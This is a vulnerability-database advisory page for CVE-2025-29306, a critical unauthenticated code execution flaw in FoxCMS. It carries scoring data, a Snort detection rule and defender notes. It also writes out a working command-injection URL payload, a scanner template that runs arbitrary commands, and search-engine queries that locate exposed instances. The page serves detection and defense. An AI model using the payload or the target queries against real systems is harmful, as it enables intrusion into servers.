cbcvebase.
CVE-2025-29306
published 2025-03-27

CVE-2025-29306: An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.

PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
43.66%
98.6th percentile
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.

Affected

1 ranges
VendorProductVersion rangeFixed in
foxcmsfoxcms< 1.21.2

Detection & IOCsextracted from sources · hover to see the quote

path/images/index.html
url/images/index.html?id=${@print_r(@system("id"))}
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS FoxCMS id Parameter Command Injection Attempt (CVE-2025-29306)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/images/index.html|3f|id|3d 24|"; fast_pattern; content:"|40|print_r"; distance:0; content:"|40|system"; within:20; reference:url,github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-29306.yaml; reference:cve,2025-29306; classtype:attempted-admin; sid:2062497; rev:1; metadata:affected_product FoxCMS, attack_target Web_Server, tls_state plaintext, created_at 2025_05_21, cve CVE_2025_29306, deployment Perimeter, deployment Internal, performance_impact Low, confidence High, signature_severity Major, tag Exploit, updated_at 2025_05_21, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
yara
id: CVE-2025-29306
http:
- method: GET
  path:
  - "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
  matchers:
  - type: regex
    part: body
    regex:
    - "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
    - "root:.*:0:0:"
  - type: word
    part: body
    words:
    - "foxcms"
  • The attack targets the `id` GET parameter of `/images/index.html` with a PHP template injection payload using `@print_r(@system(...))` syntax. Look for URL-encoded `%24%7B%40print_r` or `%40system` in HTTP GET requests to this path.
  • FOFA and Shodan fingerprinting queries can identify exposed FoxCMS instances: search for `body="foxcms-logo"` or `html:"foxcms-logo"` to find targets.
  • Successful exploitation produces OS command output in the HTTP response body. Detect responses containing regex patterns `uid=[0-9]+\(\w+\) gid=[0-9]+\(\w+\)` or `root:.*:0:0:` alongside the word `foxcms`.
  • The exploit is unauthenticated (no login required). Any GET request to `/images/index.html` with a `$` character in the `id` parameter should be treated as suspicious.
  • The Snort/ET rule uses byte-level matching: HTTP URI must contain `/images/index.html?id=$` (hex: `/images/index.html|3f|id|3d 24|`) followed by `@print_r` (hex: `|40|print_r`) and `@system` (hex: `|40|system`) within 20 bytes.
  • ·The exploit script parses command output from a specific XPath location in the HTML response (`/html/body/header/div[1]/div[2]/div[1]/ul`), meaning the injection point reflects output inside the page's navigation/header structure — useful for response-based detection tuning.
  • ·The Snort rule (sid:2062497) is marked `tls_state plaintext`, meaning it will NOT fire on HTTPS/TLS-encrypted traffic. Ensure SSL inspection is in place for full coverage.
  • ·The vulnerability is in the `case display page` component (`index.html`), not a standard PHP endpoint. The injection is processed server-side as a PHP template expression, suggesting a template engine (not direct PHP eval) is involved.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.